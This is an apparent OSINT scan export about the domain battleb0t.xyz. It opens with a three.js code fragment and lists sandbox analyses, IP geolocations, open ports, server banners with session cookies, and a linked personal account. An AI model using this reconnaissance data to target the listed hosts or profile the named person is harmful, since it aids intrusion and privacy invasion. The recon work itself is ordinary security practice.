Math.sqrt(this.x*this.x+this.y*this.y+this.z*this.z)},manhattanLength:function(){return Math.abs(this.x)+Math.abs(this.y)+Math.abs(this.z)},normalize:function(){return this.divideScalar(this.length()||1)},setLength:function(e){return this.normalize().multiplyScalar(e)},lerp:function(e,t){return this.x+=(e.x-this.x)*t,this.y+=(e.y-this.y)*t,this.z+=(e.z-this.z)*t,this},lerpVectors:function(e,t,n){return this.subVectors(t,e).multiplyScalar(n).add(e)},cross:function(e,t){return void 0!==t?(console.warn("THREE.Vector3: .cross() now only accepts one argument. Use .crossVectors( a, b ) instead."),this.crossVectors(e,t)):this.crossVectors(this,e)},crossVectors:function(e,t){var n=e.x,i=e.y,r=e.z,a=t.x,o=t.y,s=t.z;return this.x=i*s-r*o,this.y=r*a-n*s,this.z=n*o-i*a,this},projectOnVector:function(e){var t=e.dot(this)/e.lengthSq();return this.copy(e).multiplyScalar(t)},projectOnPlane:function(e){return a.copy(this).projectOnVector(e),this.sub(a)},reflect:function(e){return this.sub(a.copy(e).multiplyScalar(2*this.dot(e)))},angleTo:function(e){var t=Math.sqrt(this.lengthSq()*e.lengthSq());0===t&&console.error("THREE.Vector3: angleTo() can't handle zero length vectors.");var n=this.dot(e)/t;return Math.acos(i.a.clamp(n,-1,1))},distanceTo:function(e){return Math.sqrt(this.distanceToSquared(e))},distanceToSquared:function(e){var t=this.x-e.x,n=this.y-e.y,i=this.z-e.z;return t*t+n*n+i*i},manhattanDistanceTo:function(e){return Math.abs(this.x-e.x)+Math.abs(this.y-e.y)+Math.abs(this.z-e.z)},setFromSpherical:function(e){return this.setFromSphericalCoords(e.radius,e.phi,e.theta)},setFromSphericalCoords:function(e,t,n){var i=Math.sin(t)*e;return this.x=i*Math.sin(n),this.y=Math.cos(t)*e,this.z=i*Math.cos(n),this},setFromCylindrical:function(e){return this.setFromCylindricalCoords(e.radius,e.theta,e.y)},setFromCylindricalCoords:function(e,t,n){return this.x=e*Math.sin(t),this.y=n,this.z=e*Math.cos(t),this},setFromMatrixPosition:function(e){var t=e.elements;return this.x=t[12],this.y=t[13],this.z=t[14],this},setFromMatrixScale:function(e){var t=this.setFromMatrixColumn(e,0).length(),n=this.setFromMatrixColumn(e,1).length(),i=this.setFromMatrixColumn(e,2).length();return this.x=t,this.y=n,this.z=i,this},setFromMatrixColumn:function(e,t){return this.fromArray(e.elements,4*t)},equals:function(e){return e.x===this.x&&e.y===this.y&&e.z===this.z},fromArray:function(e,t){return void 0===t&&(t=0),this.x=e[t],this.y=e[t+1],this.z=e[t+2],this},toArray:function(e,t){return void 0===e&&(e=[]),void 0===t&&(t=0),e[t]=this.x,e[t+1]=this.y,e[t+2]=this.z,e},fromBufferAttribute:function(e,t,n){return void 0!==n&&console.warn("THREE.Vector3: offset has been removed from .fromBufferAttribute()."),this.x=e.getX(t),this.y=e.getY(t),this.z=e.getZ(t),this}})},function(e,t,n){"use strict";n.d(t,"a",(function(){return o}));var i=n(3),r=n(2),a=n(6),o={common:{diffuse:{value:new i.a(15658734)},opacity:{value:1},map:{value:null},uvTransform:{value:new a.a},uv2Transform:{value:new a.a},alphaMap:{value:null}},specularmap:{specularMap:{value:null}},envmap:{envMap:{value:null},flipEnvMap:{value:-1},reflectivity:{value:1},refractionRatio:{value:.98},maxMipLevel:{value:0}},aomap:{aoMap:{value:null},aoMapIntensity:{value:1}},lightmap:{lightMap:{value:null},lightMapIntensity:{value:1}},emissivemap:{emissiveMap:{value:null}},bumpmap:{bumpMap:{value:null},bumpScale:{value:1}},normalmap:{normalMap:{value:null},normalScale:{value:new r.a(1,1)}},displacementmap:{displacementMap:{value:null},displacementScale:{value:1},displacementBias:{value:0}},roughnessmap:{roughnessMap:{value:null}},metalnessmap:{metalnessMap:{value:null}},gradientmap:{gradientMap:{value:null}},fog:{fogDensity:{value:25e-5},fogNear:{value:1},fogFar:{value:2e3},fogColor:{value:new i.a(16777215)}},lights:{ambientLightColor:{value:[]},lightProbe:{value:[]},directionalLights:{value:[],properties:{direction:{},color:{},shadow:{},shadowBias:{},shadowRadius:{},shadowMapSize:{}}},directionalShadowMap:{value:[]},directionalShadowMatrix:{value:[]},spotLights:{value:[],properties:{color:{},position:{},direction:{},distance:{},coneCos:{},penumbraCos:{},decay:{},shadow:{},shadowBias:{},shadowRadius:{},shadowMapSize:{}}},spotShadowMap:{value:[]},spotShadowMatrix:{value:[]},pointLights:{value:[],properties:{color:{},position:{},decay:{},distance:{},shadow:{},shadowBias:{},shadowRadius:{},shadowMapSize:{} | https://battleb0t.xyz/main.built.js |
| 2023-05-12 02:58:18 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'52.217.192.16', u'34.148.97.127', u'108.139.0.107', u'54.205.240.192'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://support.freshping.io/en/support/solutions/articles/237621', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_a34_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_a34_ConnHashTable<2612>_HashTable_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2612"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_a34_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_a34_IESQMMUTEX_0_331"\n "IsoScope_a34_IESQMMUTEX_0_303"\n "IsoScope_a34_IE_EarlyTabStart_0xdf0_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "UpdatingNewTabPageData"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"o.ss2.us"\n "ocsp.pki.goog"\n "ocsp.rootg2.amazontrust.com"\n "ocsp.rootca1.amazontrust.com"\n "ocsp.sca1b.amazontrust.com"\n "freshworks-portal.netlify.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"3.208.180.173:443"\n "108.138.247.6:443"\n "172.253.63.95:443"\n "52.217.192.16:443"\n "108.138.245.91:80"\n "172.217.14.195:80"\n "108.139.0.48:80"\n "108.139.0.178:80"\n "108.138.245.195:80"\n "172.217.14.195:443"\n "34.148.97.127:443"\n "108.138.246.25:443"\n "108.139.0.107:443"\n "54.205.240.192:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "CabFB10.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "ajax-loader_1_.gif" has type "GIF image data version 89a 18 x 18"- [targetUID: N/A]\n "related_articles_1_.htm" has type "HTML document ASCII text"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002556]\n "6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7nsDQ_1_.woff" has type "Web Open Font Format TrueType length 15704 version 1.1"- [targetUID: N/A]\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA]- [targetUID: 00000000-00002556]\n "icon-sprites-2_1_.png" has type "PNG image data 300 x 72 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "portal_print-a389f1ef3e87261e7264e3e70416d704_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLCz7Z1xlEw_1_.woff" has type "Web Open Font Format TrueType length 10436 version 1.1"- [targetUID: N/A]\n "portal_utils-036d877ee9df92b844f3f7e66e6b41af_1_.css" has type "UTF-8 Unicode (with BOM) text with very long lines"- [targetUID: N/A]\n "7D6243C18F0F8F9AEC6638DD210F1984_B13E2B48FEEE7ABC0415719489CB444D" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7D6243C18F0F8F9AEC6638DD210F1984_B13E2B48FEEE7ABC0415719489CB444D]- [targetUID: 00000000-00002556]\n "BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894]- [targetUID: 00000000-00002556]\n "2ZG9LS53.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2ZG9LS53.txt]- [targetUID: 00000000-00002612]\n "icomoon_1_.ttf" has type "TrueType Font data 11 tables 1st "OS/2" 14 names Macintosh type 1 string icomoon "- [targetUID: N/A]\n "~DF0BFC9FC40A762D44.TMP" has type "data"- Location: [%TEMP%\\~DF0BFC9FC40A762D44.TMP]- [targetUID: 00000000-00002612]\n "~DFF5791F511DCFC9C7.TMP" has type "data"- Location: [%TEMP%\\~DFF5791F511DCFC9C7.TMP]- [targetUID: 00000000-00002612]\n "6xKydSBYKcSV-LCoeQqfX1RYOo3i54rwlxdo_1_.woff" has type "Web Open Font Format TrueType length 16116 version 1.1"- [targetUID: N/A]\n "RecoveryStore._AE7F9723-1A2D-11ED-A081-0800271F92EE_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "theme_1_.css" has type "UTF-8 Unicode (with BOM) text with very long lines"- [targetUID: N/A]\n "~DF19E56798D5DFA061.TMP" has type "data"- Location: [%TEMP%\\~DF19E56798D5DFA061.TMP]- [targetUID: 00000000-00002612]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /en/support/solutions/articles/237621 HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: support.freshping.io\nDNT: 1\nConnection: Keep-Alive"- [Source: SSL_3.208.180.173]\n\n "28e2\n]vGr};I+Y+Jvvedp3EZ5y<J$W=399TWWWG=vz:y8<IX)=%,`B30A8 ({`6t,S(B_tr<\n&vO4 |Vz#A>ZMO`m?kJorAx1t:SDQHB@O:t.D{|CUe$*#+|h?`esw^^:]L~Lht!n&R#8Jij_.RD~A^u\\uQ<0|]u]kOI}%b@[(Rax`lEWh=\'udQz8lFV;V=~v=QpK_o\nQr<*9cgq]^N?rt:ax86z9v0D)KhyhX~yupRo7zSg\n2"er!UYdT47|$~b>=Q0^V?}3qR(NK)NK:%;t O\'R K-Q`zaEff_2nJ;vr;v9hN1<\nwRjWv\nhU%\\\'P|26yY\nx\\:zsVap;Ioa[#kS/Ni\n3O1gI+m{G~w4cE\n9.Frs:eoH]]~\n>DeZqOEB7D+\n)0K\nLpr.#Iy1}p:4-4+6Z5zI_;w+s"imo0c|#Gc;DfPSpXxo94B7DC4-L%ZL&`C)H[8T~x94g_*F\\If4ckrkrXZk:~6~nz~Py7p:nzu@A-hka60^\'{p_\nK d/J\\\\(b(auK;x\\1(tpl{++sV:N. N2y%o7W7^B>,\nC&aF77r+~ze7D,wc9W-G#Z=d0ky-_tQO{ bn~:dUbf,]!+Or~tRf0xjVZ8e}dYW )<LyNA 8WI`/`N"?|BE;}Xv]|$4`f|-!;RKrauEArNGhf!itW*>IyUl/:dkF"nfyMYH(YKptn;]:Z{,\\"u{vZ-\nZ\nvYgx1w?\n$c;j_j(8c9^;xa5>]DL+fOUp%U/2`X6y=N!X8X5*X!`&r]%"TYX6(aEt)?e7iYc[B{0]I"|QNj^*V&%Ix]&mXJ,LPn8fEe(H0;4<{0NO^g!x$?Z!-PsiY)|b|9%J9Q.(Ik*\n`~!2C`5HmN]0>\'i<0tEN@/#!p>0$KAXka1cGt?T"BjAZ%"mKB&.1)+BUUuS~_PeU%lCJW?ZvV.%\'k\\\'l\\k;1n=2\nn!K.-_2fy&p{WBQ,Q3XZ6hT,]b+p.>v:=rHv\\kEknoi"KDyqU\nd{WLu{\\ZO[Y4Xl62hNg71x|^_"il%F%eHb^lY+"eBRZ!e]Bb^S((aK]BVh%q?\n6DoVL,pbxML)I9y!U\n%8r>:X+Z&]3$Y1AB(5/R!ey@T,fb0u\nl&<m8Rc2v !C/xC?C6b!n%b\'nG\nR5JOKs}OpeH8)W7$I\nGSxaK~7oYUV*FKzg#5Q8(=!e"F.3oW2}RV^Rt^P$8Yr^-4{Wj]?hYMPi6MlT3c9#i%zp,,tIYaRFDlf):72+G+$W3aHQ.#Awve\'CvPSxDy|a/X\n(2*^SSLF!ZSUWQIJ5e?sA\n|"tr=Nz;[^y3:8jvd%c&N~A>*^r8A|Bd,$gGY9U r6]!Hy1pGG9RW# @;3`f~<pRr(u"^T!;A?^Y(I9FRJ9x\\`5%`*ca|?AlrU*NMi~@;(_xGjzk}xX\\Q.g?D:?>:x}D<z7m65s,+( [?h5%(8%,P^Vp|xC.U$z"P5b{jO&J%DNu/,t9hiSo4O?Ww_=k]!k8#Qk@ )OlBB\'\n!|\'9eF|ShbsXT9HJ=$bCbprxVo?t p\'&H+m8A=rr{-F"`U%Xa3tJ5JK xfcE P)p}gOC_j+Ui<?\nxnrE)b)Zrgl`fviA"\nJX!3Hd2$\n5Bn3n*qBjLptO:29x<\nT*\nTBf\\gpJ~>oB0fEcDHhV\\t@dGSQ=Yh}S0@AM`P!U\n%[Vq4a2L`ikFQL}i+AYqR*9e>F+qdng9_eB\'WEps, +fAa?kH\n|QE3BV)+f4.4~;c!#\nDRTAU]B.IlZK\nrzS+6_0 W !EI`Zl1=2q]h/*$l^WrT\'sg9RL[J7+uiY[eEZNAtOe>\n=UI+0o r\nC\n!vU-6>Yi{pugBye SG\n#*.ziowr4a5Zz}^:JueEM{^omwkoZ{k[K<9w`-O5Ga|K>ane:)Ma"r"~\n&Z}Lg"NlJu\n[9z4}<>O.-"OK[gL\\nykR>)?s.Uq~g}qQBX/^p9Zx1cvJ-K)YCrm8{!NpHIX^nE;i 8]IFD*8e\nk0 MDa)ZRX8tVqt&}I?CYqFNYHHG{e"*wLvv+&O+a_hJ0\\Z4vJvKB*&2+ie>|2o%d2uHg4E>-e\\7@p+}wG),5V]d!j NZ0c75CdCAOlW)6 w=lfNi6E~\'l/]\'^1uk.0 2\nP 8MgGJW}+Oq d0lGa?O2hyPeTvp\n<SCtRy%Lr+v@`6RHIIk\\&m !C(di25_k.^"C>-\n`t\'BJI z}xh*o2x6Uv\'Ds+6|qw.\nde|Z2qN~Jh\'tKw`<XiY2dV],5!XE6D4sva3F3`.<;+a^I^WVt)?-Gt[m(nMU +!^dqU m:Md]G^e1_xs\nDY;{eJWZ\n&u4\n+m:KGuN*sow854oHBCJ=\nB)k]2bT+,VF_Bh1XG;n6\'!wl!d71:_oB~~G|)3+&xBh;*y7D{z0`5*dE!ex"&+U8v6ydaHm.P\nsAyj6+B\nl~e_?jF6:h@g%u!tB]|q)#\\s5WX[5`2!!i)1%e\\#{i0wm]ZxRdfy6OOmEm_u=+BLzWb\n4\n3i;hHA?B(:Fs/4{\nLGH2Xq(p<%Yp)XHoHk+e$\nh=-D*$"U3#Hg>;i\'v6imOr$JVpT,t `iOip+NNo?Wq/^~`Ei7Do:c_*9[D\'7iED/Z]6-TZ bRxnq1D$({C3qn24>mBsr!HcQ5Z}%Vb>>&A~hcmy:D5E9.Uzz*y:` u8b;?DQP/+\\~}^y-@V,aM8M{0zI=C=\n)O:3tcy_pO%M ^FCG8#9z&-y8`OI/U[oF]XujXR-:&QvEx7Lva0eiK>h8m+Q#$&+B843=\\kxpOQ9sE\nqrdjkg2p7kR;syufNys|arodxn6OL\nF}?!nIPT(*G&HvW8?2>T"LmK>r.\nKyc_g0!tT:-cpMdpDkH^3tl%Mvm>|GPn\\SCteCyew-\nHHq6IHS?s | 34.148.97.127 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 2 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/withat_3.jpg | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:36:57 | Physical Location | No | MetaDefender | 0 | 0 | 2 | 0 | None | Tehran, Iran | 87.248.157.102 |
| 2023-05-12 02:54:27 | HTTP Headers | No | Censys | 0 | 0 | 4 | 0 | None | {"Content_Length": ["0"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Server": ["Netlify"], "X_Nf_Request_Id": ["01H04XFP518R0GMRXREDYN35MZ"], "Date": ["<REDACTED>"]} | 2600:1f18:2489:8202::c8 |
| 2023-05-12 03:41:36 | Physical Location | No | AbstractAPI | 1 | 0 | 3 | 0 | None | Eygelshoven, Limburg, 6471, Netherlands, Europe | 45.131.109.53 |
| 2023-05-12 03:01:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.36): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | scratch (Category: coding)
https://scratch.mit.edu/users/ayshoo/ | ayshoo |
| 2023-05-12 03:09:47 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 71.170.74.34.bc.googleusercontent.com | 34.74.170.71 |
| 2023-05-12 03:09:28 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | 165.232.113.85:443 | 165.232.113.85 |
| 2023-05-12 02:54:51 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 34.74.170.74:443 | 34.74.170.74 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MobileInternet (Net ID: 00:02:B3:AE:E3:34) | 50.1188, 8.6843 |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset="utf-8"
Date: <REDACTED>
Cache-Control: no-cache, no-store, must-revalidate, private
Pragma: no-cache
Set-Cookie: cprelogin=no; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082
Set-Cookie: cpsession=%3a1TMQH6MZEuqlLsFz%2c7387de1c8dd6f13e5f0cbf314c13b1f5; HttpOnly; path=/; port=2082
Set-Cookie: roundcube_sessid=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082
Set-Cookie: roundcube_sessauth=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082
Set-Cookie: Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082
Set-Cookie: horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082
Set-Cookie: Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082
Set-Cookie: Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/horde; port=2082
Set-Cookie: PPA_ID=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082
Set-Cookie: imp_key=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082
Cache-Control: no-cache, no-store, must-revalidate, private
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Content-Length: 12486
| 87.248.157.102 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | x-cache-hits: 1 | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-ewr18140-EWR", "x-cache": "HIT", "x-github-request-id": "1AD4:4FA0:AFAB37:106D10A:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "47e9025f17d9e6e936d804b3c00d7989ec4a827a", "date": "Fri, 12 May 2023 02:54:12 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "559", "x-timer": "S1683860053.987504,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 02:55:16 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://vismliko.github.io/runssitory/index.html', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar5362.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar54FB.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"connectenligne.derlma.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"\n "34.125.187.102:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ff8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_ff8_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_4088"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_ff8_ConnHashTable<4088>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_ff8_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_ff8_IE_EarlyTabStart_0xf3c_Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_ff8_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_4088"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab54EA.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab5361.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "down_1_" has type "PNG image data 15 x 15 8-bit colormap non-interlaced"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003292]\n "bullet_1_" has type "PNG image data 15 x 15 8-bit colormap non-interlaced"- [targetUID: N/A]\n "~DF82199855D99D5F85.TMP" has type "data"- Location: [%TEMP%\\~DF82199855D99D5F85.TMP]- [targetUID: 00000000-00004088]\n "~DF6973702D5F642C4C.TMP" has type "data"- Location: [%TEMP%\\~DF6973702D5F642C4C.TMP]- [targetUID: 00000000-00004088]\n "_2CF926F8-B17E-11ED-8073-0800273C3D4C_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "Cab54EA.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab54EA.tmp]- [targetUID: 00000000-00003292]\n "WIRQ4PF5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\WIRQ4PF5.txt]- [targetUID: 00000000-00004088]\n "Tar5362.tmp" has type "data"- Location: [%TEMP%\\Tar5362.tmp]- [targetUID: 00000000-00003292]\n "info_48_1_" has type "PNG image data 47 x 48 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "~DFC3F757ED4B5F6D8C.TMP" has type "data"- Location: [%TEMP%\\~DFC3F757ED4B5F6D8C.TMP]- [targetUID: 00000000-00004088]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "N0SMPU3L.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\N0SMPU3L.txt]- [targetUID: 00000000-00004088]\n "RecoveryStore._856A4483-B17B-11ED-8073-0800273C3D4C_.dat" has type "Composite 